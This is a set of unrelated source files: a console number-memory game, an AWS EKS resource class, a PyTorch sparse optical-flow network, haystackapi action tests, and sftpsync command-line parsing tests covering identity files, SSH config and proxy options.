c364457f89e057ef9df9901828c96b701916df9e | 2,242 | py | Python | memorygame.py | PatrickLopesF/number-memory | 1831c6508ce7a51b46bcf5279191af471ef1448d | [
"MIT"
] | null | null | null | memorygame.py | PatrickLopesF/number-memory | 1831c6508ce7a51b46bcf5279191af471ef1448d | [
"MIT"
] | null | null | null | memorygame.py | PatrickLopesF/number-memory | 1831c6508ce7a51b46bcf5279191af471ef1448d | [
"MIT"
] | null | null | null | import random
from os import system, name
from time import sleep
list = []
round = 1
GAME_DIF = input("Choose your difficulty!\na)Easy\nb)Medium\nc)Hard\nd)Impossible\n")
if GAME_DIF == "a":
n = 2.25
elif GAME_DIF == "b":
n = 1.75
elif GAME_DIF == "c":
n = 1.25
elif GAME_DIF == "d":
n = 0.75
else:
print("Invalid input.")
def clear():
if name == 'nt':
_ = system('cls')
sleep(1)
clear()
list.append(random.randint(1, 9))
x = ''.join(str(e) for e in list)
print(str(x))
sleep(n)
clear()
y = input("Number: ")
clear()
x = ''.join(str(e) for e in list)
while x == y:
del list[:]
for i in range(0, round + 1):
list.append(random.randint(1, 9))
x = ''.join(str(e) for e in list)
print(x)
sleep(n)
clear()
y = input("Number: ")
clear()
round += 1
if x != y:
print("You lost!")
print("Your score was: " + str(round - 1))
sleep(2)
clear()
AGAIN = input("Do you want to play again?\nEnter Y for YES or N for NO\n")
clear()
while AGAIN == "Y":
list = []
round = 1
GAME_DIF = input("Choose your difficulty!\na)Easy\nb)Medium\nc)Hard\nd)Impossible\n")
if GAME_DIF == "a":
n = 2.5
elif GAME_DIF == "b":
n = 1.75
elif GAME_DIF == "c":
n = 1
elif GAME_DIF == "d":
n = 0.5
else:
print("Invalid input.")
sleep(1)
clear()
list.append(random.randint(1, 9))
x = ''.join(str(e) for e in list)
print(str(x))
sleep(n)
clear()
y = input("Number: ")
clear()
x = ''.join(str(e) for e in list)
while x == y:
del list[:]
for i in range(0, round + 1):
list.append(random.randint(1, 9))
x = ''.join(str(e) for e in list)
print(x)
sleep(n)
clear()
y = input("Number: ")
clear()
round += 1
if x != y:
print("You lost!")
print("Your score was: " + str(round - 1))
sleep(2)
clear()
AGAIN = input("Do you want to play again?\nEnter Y for YES or N for NO\n")
clear()
exit() | 21.352381 | 90 | 0.486173 | 333 | 2,242 | 3.24024 | 0.219219 | 0.064875 | 0.061168 | 0.050046 | 0.86747 | 0.86747 | 0.84152 | 0.84152 | 0.84152 | 0.84152 | 0 | 0.029006 | 0.354148 | 2,242 | 105 | 91 | 21.352381 | 0.71616 | 0 | 0 | 0.844444 | 0 | 0.022222 | 0.172043 | 0.049556 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011111 | false | 0 | 0.033333 | 0 | 0.044444 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c36cdb6c265cff308a1cdc3f2c508c6d6d891a60 | 238 | py | Python | altimeter/aws/resource/eks/__init__.py | elliotsegler/altimeter | c3924524938b4bae86b1acda2a4fc3f79ac523ff | [
"MIT"
] | 48 | 2019-11-06T03:20:53.000Z | 2022-02-22T21:10:45.000Z | altimeter/aws/resource/eks/__init__.py | elliotsegler/altimeter | c3924524938b4bae86b1acda2a4fc3f79ac523ff | [
"MIT"
] | 27 | 2020-01-07T23:48:30.000Z | 2022-02-26T00:24:04.000Z | altimeter/aws/resource/eks/__init__.py | elliotsegler/altimeter | c3924524938b4bae86b1acda2a4fc3f79ac523ff | [
"MIT"
] | 21 | 2019-12-20T03:06:35.000Z | 2021-12-15T23:26:00.000Z | """AWSResourceSpec subclass for eks resources."""
from altimeter.aws.resource.resource_spec import AWSResourceSpec
class EKSResourceSpec(AWSResourceSpec):
"""AWSResourceSpec subclass for eks resources."""
service_name = "eks"
| 23.8 | 64 | 0.773109 | 24 | 238 | 7.583333 | 0.625 | 0.252747 | 0.285714 | 0.318681 | 0.417582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130252 | 238 | 9 | 65 | 26.444444 | 0.879227 | 0.365546 | 0 | 0 | 0 | 0 | 0.021429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6f44eb061ff5b00bfb2f98410ccd8ba502306932 | 12,813 | py | Python | core/sparsenet.py | zacjiang/SCV | 9f809910e17125701b28dc1054fbc7648b801957 | [
"WTFPL"
] | 115 | 2021-04-15T14:01:30.000Z | 2022-03-30T02:54:04.000Z | core/sparsenet.py | jiaw-z/SCV | 9f809910e17125701b28dc1054fbc7648b801957 | [
"WTFPL"
] | 4 | 2021-06-17T19:50:21.000Z | 2021-12-22T06:30:20.000Z | core/sparsenet.py | jiaw-z/SCV | 9f809910e17125701b28dc1054fbc7648b801957 | [
"WTFPL"
] | 14 | 2021-06-13T13:59:17.000Z | 2022-03-28T13:34:35.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from extractor import BasicEncoder, BasicEncoderQuarter
from update import BasicUpdateBlock, BasicUpdateBlockQuarter
from utils.utils import bilinear_sampler, coords_grid, coords_grid_y_first,\
upflow4, compute_interpolation_weights
from knn import knn_faiss_raw
autocast = torch.cuda.amp.autocast
def compute_sparse_corr(fmap1, fmap2, k=32):
"""
Compute a cost volume containing the k-largest hypotheses for each pixel.
Output: corr_mink
"""
B, C, H1, W1 = fmap1.shape
H2, W2 = fmap2.shape[2:]
N = H1 * W1
fmap1, fmap2 = fmap1.view(B, C, -1), fmap2.view(B, C, -1)
with torch.no_grad():
_, indices = knn_faiss_raw(fmap1, fmap2, k) # [B, k, H1*W1]
indices_coord = indices.unsqueeze(1).expand(-1, 2, -1, -1) # [B, 2, k, H1*W1]
coords0 = coords_grid_y_first(B, H2, W2).view(B, 2, 1, -1).expand(-1, -1, k, -1).to(fmap1.device) # [B, 2, k, H1*W1]
coords1 = coords0.gather(3, indices_coord) # [B, 2, k, H1*W1]
coords1 = coords1 - coords0
# Append batch index
batch_index = torch.arange(B).view(B, 1, 1, 1).expand(-1, -1, k, N).type_as(coords1)
# Gather by indices from map2 and compute correlation volume
fmap2 = fmap2.gather(2, indices.view(B, 1, -1).expand(-1, C, -1)).view(B, C, k, N)
corr_sp = torch.einsum('bcn,bckn->bkn', fmap1, fmap2).contiguous() / torch.sqrt(torch.tensor(C).float()) # [B, k, H1*W1]
return corr_sp, coords0, coords1, batch_index # coords: [B, 2, k, H1*W1]
class FlowHead(nn.Module):
def __init__(self, input_dim=256, batch_norm=True):
super().__init__()
if batch_norm:
self.flowpredictor = nn.Sequential(
nn.Conv2d(input_dim, 128, 3, padding=1),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
nn.Conv2d(128, 64, 3, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.Conv2d(64, 2, 3, padding=1)
)
else:
self.flowpredictor = nn.Sequential(
nn.Conv2d(input_dim, 128, 3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(128, 64, 3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(64, 2, 3, padding=1)
)
def forward(self, x):
return self.flowpredictor(x)
class SparseNet(nn.Module):
def __init__(self, args):
super().__init__()
self.args = args
# feature network, context network, and update block
self.fnet = BasicEncoderQuarter(output_dim=256, norm_fn='instance', dropout=False)
self.cnet = BasicEncoderQuarter(output_dim=256, norm_fn='batch', dropout=False)
# correlation volume encoder
self.update_block = BasicUpdateBlockQuarter(self.args, hidden_dim=128, input_dim=405)
def initialize_flow(self, img):
""" Flow is represented as difference between two coordinate grids flow = coords1 - coords0"""
N, C, H, W = img.shape
coords0 = coords_grid(N, H//4, W//4).to(img.device)
coords1 = coords_grid(N, H//4, W//4).to(img.device)
# optical flow computed as difference: flow = coords1 - coords0
return coords0, coords1
def upsample_flow_quarter(self, flow, mask):
""" Upsample flow field [H/4, W/4, 2] -> [H, W, 2] using convex combination """
N, _, H, W = flow.shape
mask = mask.view(N, 1, 9, 4, 4, H, W)
mask = torch.softmax(mask, dim=2)
up_flow = F.unfold(4 * flow, [3,3], padding=1)
up_flow = up_flow.view(N, 2, 9, 1, 1, H, W)
up_flow = torch.sum(mask * up_flow, dim=2)
up_flow = up_flow.permute(0, 1, 4, 2, 5, 3)
return up_flow.reshape(N, 2, 4*H, 4*W)
def forward(self, image1, image2, iters, flow_init=None, test_mode=False):
""" Estimate optical flow between pair of frames """
image1 = 2 * (image1 / 255.0) - 1.0
image2 = 2 * (image2 / 255.0) - 1.0
image1 = image1.contiguous()
image2 = image2.contiguous()
# run the feature and context network
with autocast(enabled=self.args.mixed_precision):
fmap1, fmap2 = self.fnet([image1, image2])
cnet = self.cnet(image1)
net, inp = torch.split(cnet, [128, 128], dim=1)
net = torch.tanh(net)
inp = torch.relu(inp)
fmap1 = fmap1.float()
fmap2 = fmap2.float()
B, _, H1, W1 = fmap1.shape
# GRU
coords0, coords1 = self.initialize_flow(image1)
if flow_init is not None:
coords1 = coords1 + flow_init
# Generate sparse cost volume for GRU
corr_val, coords0_cv, coords1_cv, batch_index_cv = compute_sparse_corr(fmap1, fmap2, k=self.args.num_k)
delta_flow = torch.zeros_like(coords0)
flow_predictions = []
search_range = 4
corr_val = corr_val.repeat(1, 4, 1)
for itr in range(iters):
with torch.no_grad():
# need to switch order of delta_flow, also note the minus sign
coords1_cv = coords1_cv - delta_flow[:, [1, 0], :, :].view(B, 2, 1, -1) # [B, 2, k, H1*W1]
mask_pyramid = []
weights_pyramid = []
coords_sparse_pyramid = []
# Create multi-scale displacements
for i in range(5):
coords1_sp = coords1_cv * 0.5**i
weights, coords1_sp = compute_interpolation_weights(coords1_sp)
mask = (coords1_sp[:, 0].abs() <= search_range) & (coords1_sp[:, 1].abs() <= search_range)
batch_ind = batch_index_cv.permute(0, 2, 3, 1).repeat(1, 4, 1, 1)[mask]
coords0_sp = coords0_cv.permute(0, 2, 3, 1).repeat(1, 4, 1, 1)[mask]
coords1_sp = coords1_sp.permute(0, 2, 3, 1)[mask]
coords1_sp = coords1_sp + search_range
coords_sp = torch.cat([batch_ind, coords0_sp, coords1_sp], dim=1)
coords_sparse_pyramid.append(coords_sp)
mask_pyramid.append(mask)
weights_pyramid.append(weights)
corr_val_pyramid = []
for mask, weights in zip(mask_pyramid, weights_pyramid):
corr_masked = (weights * corr_val)[mask].unsqueeze(1)
corr_val_pyramid.append(corr_masked)
sparse_tensor_pyramid = [torch.sparse.FloatTensor(coords_sp.t().long(), corr_resample, torch.Size([B, H1, W1, 9, 9, 1])).coalesce()
for coords_sp, corr_resample in zip(coords_sparse_pyramid, corr_val_pyramid)]
corr = torch.cat([sp.to_dense().view(B, H1, W1, -1) for sp in sparse_tensor_pyramid], dim=3).permute(0, 3, 1, 2)
coords1 = coords1.detach()
flow = coords1 - coords0
# GRU Update
with autocast(enabled=self.args.mixed_precision):
# 4D net map to 2D dense vector
net, up_mask, delta_flow = self.update_block(net, inp, corr, flow)
# F(t+1) = F(t) + \Delta(t)
coords1 = coords1 + delta_flow
# upsample predictions
if up_mask is None:
flow_up = upflow4(coords1 - coords0)
else:
flow_up = self.upsample_flow_quarter(coords1 - coords0, up_mask)
flow_predictions.append(flow_up)
if test_mode:
return flow_up
return flow_predictions
class SparseNetEighth(nn.Module):
def __init__(self, args):
super().__init__()
self.args = args
# feature network, context network, and update block
self.fnet = BasicEncoder(output_dim=256, norm_fn='instance', dropout=False)
self.cnet = BasicEncoder(output_dim=256, norm_fn='batch', dropout=False)
# correlation volume encoder
self.update_block = BasicUpdateBlock(self.args, hidden_dim=128, input_dim=405)
def initialize_flow(self, img):
""" Flow is represented as difference between two coordinate grids flow = coords1 - coords0"""
N, C, H, W = img.shape
coords0 = coords_grid(N, H//8, W//8).to(img.device)
coords1 = coords_grid(N, H//8, W//8).to(img.device)
# optical flow computed as difference: flow = coords1 - coords0
return coords0, coords1
def upsample_flow(self, flow, mask):
""" Upsample flow field [H/8, W/8, 2] -> [H, W, 2] using convex combination """
N, _, H, W = flow.shape
mask = mask.view(N, 1, 9, 8, 8, H, W)
mask = torch.softmax(mask, dim=2)
up_flow = F.unfold(8 * flow, [3,3], padding=1)
up_flow = up_flow.view(N, 2, 9, 1, 1, H, W)
up_flow = torch.sum(mask * up_flow, dim=2)
up_flow = up_flow.permute(0, 1, 4, 2, 5, 3)
return up_flow.reshape(N, 2, 8*H, 8*W)
def forward(self, image1, image2, iters, flow_init=None, test_mode=False):
""" Estimate optical flow between pair of frames """
image1 = 2 * (image1 / 255.0) - 1.0
image2 = 2 * (image2 / 255.0) - 1.0
image1 = image1.contiguous()
image2 = image2.contiguous()
# run the feature and context network
with autocast(enabled=self.args.mixed_precision):
fmap1, fmap2 = self.fnet([image1, image2])
cnet = self.cnet(image1)
net, inp = torch.split(cnet, [128, 128], dim=1)
net = torch.tanh(net)
inp = torch.relu(inp)
fmap1 = fmap1.float()
fmap2 = fmap2.float()
B, _, H1, W1 = fmap1.shape
# GRU
coords0, coords1 = self.initialize_flow(image1)
if flow_init is not None:
coords1 = coords1 + flow_init
# Generate sparse cost volume for GRU
corr_val, coords0_cv, coords1_cv, batch_index_cv = compute_sparse_corr(fmap1, fmap2, k=self.args.num_k)
delta_flow = torch.zeros_like(coords0)
flow_predictions = []
search_range = 4
corr_val = corr_val.repeat(1, 4, 1)
for itr in range(iters):
with torch.no_grad():
# need to switch order of delta_flow, also note the minus sign
coords1_cv = coords1_cv - delta_flow[:, [1, 0], :, :].view(B, 2, 1, -1) # [B, 2, k, H1*W1]
mask_pyramid = []
weights_pyramid = []
coords_sparse_pyramid = []
# Create multi-scale displacements
for i in range(5):
coords1_sp = coords1_cv * 0.5**i
weights, coords1_sp = compute_interpolation_weights(coords1_sp)
mask = (coords1_sp[:, 0].abs() <= search_range) & (coords1_sp[:, 1].abs() <= search_range)
batch_ind = batch_index_cv.permute(0, 2, 3, 1).repeat(1, 4, 1, 1)[mask]
coords0_sp = coords0_cv.permute(0, 2, 3, 1).repeat(1, 4, 1, 1)[mask]
coords1_sp = coords1_sp.permute(0, 2, 3, 1)[mask]
coords1_sp = coords1_sp + search_range
coords_sp = torch.cat([batch_ind, coords0_sp, coords1_sp], dim=1)
coords_sparse_pyramid.append(coords_sp)
mask_pyramid.append(mask)
weights_pyramid.append(weights)
corr_val_pyramid = []
for mask, weights in zip(mask_pyramid, weights_pyramid):
corr_masked = (weights * corr_val)[mask].unsqueeze(1)
corr_val_pyramid.append(corr_masked)
sparse_tensor_pyramid = [torch.sparse.FloatTensor(coords_sp.t().long(), corr_resample, torch.Size([B, H1, W1, 9, 9, 1])).coalesce()
for coords_sp, corr_resample in zip(coords_sparse_pyramid, corr_val_pyramid)]
corr = torch.cat([sp.to_dense().view(B, H1, W1, -1) for sp in sparse_tensor_pyramid], dim=3).permute(0, 3, 1, 2)
coords1 = coords1.detach()
flow = coords1 - coords0
# Not sure if it will affect results.
with autocast(enabled=self.args.mixed_precision):
# 4D net map to 2D dense vector
net, up_mask, delta_flow = self.update_block(net, inp, corr, flow)
# F(t+1) = F(t) + \Delta(t)
coords1 = coords1 + delta_flow
# upsample predictions
if up_mask is None:
flow_up = upflow4(coords1 - coords0)
else:
flow_up = self.upsample_flow(coords1 - coords0, up_mask)
flow_predictions.append(flow_up)
if test_mode:
return flow_up
return flow_predictions
| 38.020772 | 143 | 0.574807 | 1,714 | 12,813 | 4.128355 | 0.135939 | 0.025438 | 0.005653 | 0.00424 | 0.837761 | 0.83013 | 0.810345 | 0.801865 | 0.798474 | 0.798474 | 0 | 0.056238 | 0.3075 | 12,813 | 336 | 144 | 38.133929 | 0.741237 | 0.120425 | 0 | 0.741627 | 0 | 0 | 0.003488 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.033493 | 0.004785 | 0.148325 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6f79bfc127d88a5ee649969ffe4362b39279ca70 | 2,046 | py | Python | tests/test_haystack_invoke_action.py | sgrah-oss/haystackapi | dc6000120e5ef97b174bb1440460ce170f22026e | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | tests/test_haystack_invoke_action.py | sgrah-oss/haystackapi | dc6000120e5ef97b174bb1440460ce170f22026e | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | tests/test_haystack_invoke_action.py | sgrah-oss/haystackapi | dc6000120e5ef97b174bb1440460ce170f22026e | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | from unittest.mock import patch
import haystackapi
from haystackapi import Ref
from haystackapi.ops import HaystackHttpRequest
from haystackapi.providers import ping
@patch.dict('os.environ', {'HAYSTACK_PROVIDER': 'haystackapi.providers.ping'})
@patch.object(ping.Provider, 'invoke_action')
def test_invoke_action_with_zinc(mock) -> None:
# GIVEN
mock.return_value = ping.PingGrid
mime_type = haystackapi.MODE_ZINC
request = HaystackHttpRequest()
grid = haystackapi.Grid(metadata={'id': Ref('123'), 'action': 'doIt'},
columns={'key': {}, 'value': {}})
grid.append({'param': 'value'})
request.headers["Content-Type"] = mime_type
request.headers["Accept"] = mime_type
request.body = haystackapi.dump(grid, mode=haystackapi.MODE_ZINC)
# WHEN
response = haystackapi.invoke_action(request, "dev")
# THEN
mock.assert_called_once_with(Ref("123"), "doIt", {})
assert response.status_code == 200
assert response.headers["Content-Type"].startswith(mime_type)
assert haystackapi.parse(response.body, haystackapi.MODE_ZINC) is not None
@patch.dict('os.environ', {'HAYSTACK_PROVIDER': 'haystackapi.providers.ping'})
@patch.object(ping.Provider, 'invoke_action')
def test_invoke_action_without_params_with_zinc(mock):
# GIVEN
mock.return_value = ping.PingGrid
mime_type = haystackapi.MODE_ZINC
request = HaystackHttpRequest()
grid = haystackapi.Grid(metadata={'id': Ref('123'), 'action': 'doIt'},
columns={'key': {}, 'value': {}})
request.headers["Content-Type"] = mime_type
request.headers["Accept"] = mime_type
request.body = haystackapi.dump(grid, mode=haystackapi.MODE_ZINC)
# WHEN
response = haystackapi.invoke_action(request, "dev")
# THEN
mock.assert_called_once_with(Ref("123"), "doIt", {})
assert response.status_code == 200
assert response.headers["Content-Type"].startswith(mime_type)
assert haystackapi.parse(response.body, haystackapi.MODE_ZINC) is not None
| 37.888889 | 78 | 0.699902 | 242 | 2,046 | 5.752066 | 0.256198 | 0.045977 | 0.081897 | 0.025862 | 0.855603 | 0.855603 | 0.855603 | 0.855603 | 0.855603 | 0.855603 | 0 | 0.010508 | 0.162757 | 2,046 | 53 | 79 | 38.603774 | 0.802102 | 0.015152 | 0 | 0.789474 | 0 | 0 | 0.133466 | 0.025896 | 0 | 0 | 0 | 0 | 0.210526 | 1 | 0.052632 | false | 0 | 0.131579 | 0 | 0.184211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
48cb998d8975433383331744ddb6819de1b68348 | 24,494 | py | Python | tests/command_line_test.py | marccarre/sftpsync | cf408f6b768fd5c7c0559cb25e72020f92a5a5f6 | [
"Apache-2.0"
] | 1 | 2015-04-01T20:30:48.000Z | 2015-04-01T20:30:48.000Z | tests/command_line_test.py | marccarre/sftpsync | cf408f6b768fd5c7c0559cb25e72020f92a5a5f6 | [
"Apache-2.0"
] | null | null | null | tests/command_line_test.py | marccarre/sftpsync | cf408f6b768fd5c7c0559cb25e72020f92a5a5f6 | [
"Apache-2.0"
] | 2 | 2015-03-31T18:40:17.000Z | 2021-08-15T16:12:37.000Z | from unittest2 import TestCase, main
from tests.test_utilities import FakeStdOut, FakeStdErr, NonWritableFolder, NonReadableFolder, path_for
from six import assertRaisesRegex
from getpass import getuser
from sftpsync.command_line import usage, configure
import socks
DEFAULT_ARGS = ['sftp://user:pass@sftp-server.example.com:22/data', path_for('.')]
class CommandLineTest(TestCase):
def test_usage(self):
with FakeStdOut() as out:
usage()
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_usage_with_error_message(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
usage('Invalid argument "foo".')
self.assertIn('ERROR: Invalid argument "foo".', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_with_non_existing_short_option(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-z'])
self.assertIn('ERROR: option -z not recognized', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_with_non_existing_long_option(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--non-existing'])
self.assertIn('ERROR: option --non-existing not recognized', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_help_short_option(self):
with FakeStdOut() as out:
self.assertRaisesRegex(SystemExit, '', configure, ['-h'])
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_help_long_option(self):
with FakeStdOut() as out:
self.assertRaisesRegex(SystemExit, '', configure, ['--help'])
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_defaults(self):
config = configure([] + DEFAULT_ARGS)
self.assertEqual(config['force'], False)
self.assertEqual(config['preserve'], False)
self.assertEqual(config['quiet'], False)
self.assertEqual(config['recursive'], False)
self.assertEqual(config['verbose'], False)
self.assertIsNone(config['private_key'])
self.assertIsNone(config['proxy'])
self.assertEqual(config['proxy_version'], socks.SOCKS5)
self.assertEqual(len(config['ssh_options']), 0)
def test_configure_force_short_option(self):
config = configure(['-f'] + DEFAULT_ARGS)
self.assertEqual(config['force'], True)
def test_configure_force_long_option(self):
config = configure(['--force'] + DEFAULT_ARGS)
self.assertEqual(config['force'], True)
def test_configure_preserve_short_option(self):
config = configure(['-p'] + DEFAULT_ARGS)
self.assertEqual(config['preserve'], True)
def test_configure_preserve_long_option(self):
config = configure(['--preserve'] + DEFAULT_ARGS)
self.assertEqual(config['preserve'], True)
def test_configure_quiet_short_option(self):
config = configure(['-q'] + DEFAULT_ARGS)
self.assertEqual(config['quiet'], True)
def test_configure_quiet_long_option(self):
config = configure(['--quiet'] + DEFAULT_ARGS)
self.assertEqual(config['quiet'], True)
def test_configure_recursive_short_option(self):
config = configure(['-r'] + DEFAULT_ARGS)
self.assertEqual(config['recursive'], True)
def test_configure_recursive_long_option(self):
config = configure(['--recursive'] + DEFAULT_ARGS)
self.assertEqual(config['recursive'], True)
def test_configure_verbose_short_option(self):
config = configure(['-v'] + DEFAULT_ARGS)
self.assertEqual(config['verbose'], True)
def test_configure_verbose_long_option(self):
config = configure(['--verbose'] + DEFAULT_ARGS)
self.assertEqual(config['verbose'], True)
def test_configure_verbose_and_quiet_at_the_same_time(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--quiet', '--verbose'] + DEFAULT_ARGS)
self.assertIn('ERROR: Please provide either -q/--quiet OR -v/--verbose, but NOT both at the same time.', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_identity_short_option(self):
config = configure(['-i', path_for('test_sftp_server_rsa')] + DEFAULT_ARGS)
self.assertIsNotNone(config['private_key'])
# Verify path components:
self.assertIn('sftpsync', config['private_key'])
self.assertIn('tests', config['private_key'])
self.assertIn('test_sftp_server_rsa', config['private_key'])
def test_configure_identity_long_option(self):
config = configure(['--identity', path_for('test_sftp_server_rsa')] + DEFAULT_ARGS)
self.assertIsNotNone(config['private_key'])
# Verify path components:
self.assertIn('sftpsync', config['private_key'])
self.assertIn('tests', config['private_key'])
self.assertIn('test_sftp_server_rsa', config['private_key'])
def test_configure_missing_identity(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--identity'])
self.assertIn('ERROR: option --identity requires argument', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_empty_identity(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--identity', ''] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid path: "". Please provide a valid path to your private key.', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_non_existing_identity(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--identity', path_for('non_existing_private_key')] + DEFAULT_ARGS)
error_message = err.getvalue()
self.assertIn('ERROR: Invalid path: "', error_message)
self.assertIn('non_existing_private_key". Provided path does NOT exist. Please provide a valid path to your private key.', error_message)
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_ssh_configuration_short_option(self):
config = configure(['-F', path_for('test_ssh_config')] + DEFAULT_ARGS)
self.assertIsNotNone(config['ssh_config'])
# Verify path components:
self.assertIn('sftpsync', config['ssh_config'])
self.assertIn('tests', config['ssh_config'])
self.assertIn('test_ssh_config', config['ssh_config'])
def test_configure_missing_ssh_configuration(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-F'])
self.assertIn('ERROR: option -F requires argument', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_empty_ssh_configuration(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-F', ''] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid path: "". Please provide a valid path to your SSH configuration.', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_non_existing_ssh_configuration(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-F', path_for('non_existing_ssh_config')] + DEFAULT_ARGS)
error_message = err.getvalue()
self.assertIn('ERROR: Invalid path: "', error_message)
self.assertIn('non_existing_ssh_config". Provided path does NOT exist. Please provide a valid path to your SSH configuration.', error_message)
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_ssh_option_proxy_command_using_equal_sign(self):
config = configure(['-o', 'ProxyCommand=nc -X 5 -x localhost:1080 %h %p'] + DEFAULT_ARGS)
self.assertEqual(len(config['ssh_options']), 1)
self.assertEqual(config['ssh_options']['ProxyCommand'], 'nc -X 5 -x localhost:1080 %h %p')
def test_configure_ssh_option_proxy_command_using_whitespace(self):
config = configure(['-o', 'ProxyCommand nc -X 5 -x localhost:1080 %h %p'] + DEFAULT_ARGS)
self.assertEqual(len(config['ssh_options']), 1)
self.assertEqual(config['ssh_options']['ProxyCommand'], 'nc -X 5 -x localhost:1080 %h %p')
def test_configure_missing_ssh_option(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-o'])
self.assertIn('ERROR: option -o requires argument', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_empty_ssh_option(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-o', ''] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid SSH option: "".', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_ssh_option_with_empty_key_using_equal_sign(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-o', '=nc -X 5 -x localhost:1080 %h %p'] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid SSH option: "=nc -X 5 -x localhost:1080 %h %p".', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_ssh_option_with_empty_value_using_equal_sign(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-o', 'ProxyCommand='] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid SSH option: "ProxyCommand=', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_ssh_option_with_empty_key_using_whitespace(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-o', ' nc -X 5 -x localhost:1080 %h %p'] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid SSH option: " nc -X 5 -x localhost:1080 %h %p".', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
